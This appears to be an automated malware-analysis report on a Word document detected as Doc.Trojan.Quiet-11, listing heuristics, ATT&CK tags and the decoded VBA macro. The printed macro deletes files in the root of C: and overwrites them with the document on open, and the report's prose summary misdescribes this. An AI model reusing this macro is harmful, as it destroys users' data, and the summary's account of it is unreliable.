MALICIOUS
160
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro that executes upon opening the document. This macro uses the Shell function to execute commands, indicating malicious intent. The macro attempts to copy the document to various locations on the C: drive and delete the original, likely to establish persistence or spread.
Heuristics 4
-
ClamAV: Doc.Trojan.Quiet-11 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Quiet-11
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 721 bytes |
SHA-256: 8b423532ac136763b0c3c36d860c1a4ba1c697d63bb22fc57bb454fd9d3ece02 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Declare Sub CopyFileA Lib "kernel32" (ByVal src As String, ByVal dst As String, ByVal mode As Long) Sub Document_Open() On Error Resume Next Set FS = Application.FileSearch FS.NewSearch FS.FileName = "*.*" FS.LookIn = "C:\" FS.SearchSubFolders = False FS.Execute For i = 1 To FS.FoundFiles.Count If FS.FoundFiles(i) <> ActiveDocument.FullName Then Kill FS.FoundFiles(i) CopyFileA ActiveDocument.FullName, FS.FoundFiles(i), 0 End If Next i End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.